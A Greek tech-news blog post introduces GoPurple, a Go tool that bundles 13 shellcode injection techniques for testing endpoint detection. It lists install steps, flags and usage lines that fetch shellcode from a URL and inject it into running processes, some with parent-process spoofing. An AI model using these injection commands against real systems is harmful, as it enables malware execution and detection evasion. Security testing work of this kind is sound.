• Skip to main content
  • Skip to header right navigation
  • Skip to site footer
iGuRu

iGuRu

Νέα Τεχνολογίας σε πραγματικό χρόνο. Απόψεις & Tweaks

  • /news
  • /infosec
  • /tools
  • /tweaks
  • /dummies
  • /απόψεις
  • /support
  • /yourpost
home / news / GoPurple: Τεχνικές shell code injection

GoPurple: Τεχνικές shell code injection

23/09/2020 11:23 by Anastasis Vasileiadis

Το GoPurple είναι μια απλή συλλογή διαφόρων shell code injection τεχνικών, με στόχο τον εξορθολογισμό της διαδικασίας αξιολόγησης για την ανίχνευση του end point, αλλά και μια πρόκληση για να μπείτε στον κόσμο του Golang.

demo1 - GoPurple: Τεχνικές shell code injection

Εγκατάσταση

git clone https://github.com/sh4hin/GoPurple.git

cd GoPurple

go build gopurple.go

Χρήση

-a string
Program command line arguments
-b string
block DLL mode (nonms/onlystore for QueueUserAPC )
-p int
Process ID to inject shellcode into
-prog string
program to inject into
-t string
shellcode injection technique to use:
1: CreateFiber
2: syscall
3: CreatetThreadNative
4: CreateProcess
5: EtwpCreateEtwThread
6: CreateRemoteThread
7: RtlCreateUserThread
8: CreateThread
9: CreateRemoteThreadNative
10: CreateProcessWithPipe
11: QueueUserAPC
12: CreateThreadpoolWaitpool
13: BananaPhone
-u string
URL hosting the shellcode

Οδηγός

1 – gopurple.exe -u urlhostingpayload -t 1 (CreateFiber)

2 – gopurple.exe -u urlhostingpayload -t 2 (Syscall)

3 – gopurple.exe -u urlhostingpayload -t 3 (CreatetThreadNative)

4 – gopurple.exe -u urlhostingpayload -t 4 (CreateProcess)

5 – gopurple.exe -u urlhostingpayload -t 5 (EtwpCreateEtwThread)

6 – gopurple.exe -u urlhostingpayload -t 6 -p tagetprocess (CreateRemoteThread)

7 – gopurple.exe -u urlhostingpayload -t 7 -p tagetprocess (RtlCreateUserThread)

8 – gopurple.exe -u urlhostingpayload -t 8 //(CreateThread)

9 – gopurple.exe -u urlhostingpayload -t 9 -p tagetprocess (CreateRemoteThreadNative)

10 – gopurple.exe -u urlhostingpayload -t 10 -prog porgram -a processargument (ex:C:\Windows\System32\WindowsPowerShell\v1.0) and processargument(ex:Get-Process) (CreateProcessWithPipe)

11 – gopurple.exe -u urlhostingpayload -t 11 -p targetpidasparentprocess -prog programtoinjectshellcodeinto -b methodtoblockdll(nonms or onlystore) (QueueUserAPC)

nonms = only DLLs that are signed by Microsoft can hook into the process

onlystore = only Microsoft store application’s process can hook into the process

12 – gopurple.exe -u urlhostingpayload -t 12 (CreateThreadpoolWaitpool)

13 – gopurple.exe -u urlhostingpayload -t 13 (BananaPhone)

Στιγμιότυπα εφαρμογής

demo2 - GoPurple: Τεχνικές shell code injection

demo3 - GoPurple: Τεχνικές shell code injection

Μπορείτε να κατεβάσετε το πρόγραμμα από εδώ.

GoPurple: Τεχνικές shell code injection was last modified: 23 Σεπτεμβρίου, 2020, 11:23 πμ by Anastasis Vasileiadis

spread the news

  • Facebook
  • Twitter
  • Reddit
  • Εκτύπωση
  • Email

Διαβάστε τις Τεχνολογικές Ειδήσεις από όλο τον κόσμο, με την εγκυρότητα του iGuRu.gr

Ακολουθήσετε μας στο Google News


Κατηγορία: news

You May Also Like

Μόνος στην καραντίνα; Πάρε μια Sophia
SAS : Οι προβλέψεις για το 2021 – AI και ψηφιακή μετάβαση
Firefox 85.0 λήψη πριν την επίσημη κυκλοφορία

Σχετικά Anastasis Vasileiadis

Οι μεταφράσεις είναι σαν τις γυναίκες. Όταν είναι ωραίες δεν είναι πιστές και όταν είναι πιστές δεν είναι ωραίες.

Previous Post: « Η γλώσσα Swift είναι διαθέσιμη για Windows
Next Post: Αποτροπή σύνδεσης τηλεφώνου-υπολογιστή σε Windows 10 »

Reader Interactions

Comment Policy:

Tο iGuRu.gr δεν δημοσιεύει άμεσα τα σχόλια. Κακόβουλα σχόλια, σχόλια που συμπεριλαμβάνουν διαφημίσεις, ή σχόλια με ύβρεις διαγράφονται χωρίς καμία προειδοποίηση. Δεν υιοθετούμε τις απόψεις που εκφράζουν οι αναγνώστες μας.
Τα σχολιά σας θα εμφανιστούν μετά την έγκρισή τους από τους διαχειριστές


Αφήστε το σχόλιό σας
Ακύρωση απάντησης

Η ηλ. διεύθυνση σας δεν δημοσιεύεται. Τα υποχρεωτικά πεδία σημειώνονται με *

 

 © 2021 · iGuRu.gr · ☢ · Keep It Simple Stupid Genesis theme

about  ·   contact  ·  rss  ·  sitemap  ·  tos

loading Άκυρο
Δεν ήταν δυνατή η αποστολή της δημοσίευσης - ελέγξτε την διεύθυνση email!
Ο έλεγχος του email απέτυχε, παρακαλώ προσπαθήστε ξανά
Το ιστολόγιο σας δεν μπορεί να κοινοποιεί δημοσιεύσεις μέσω email.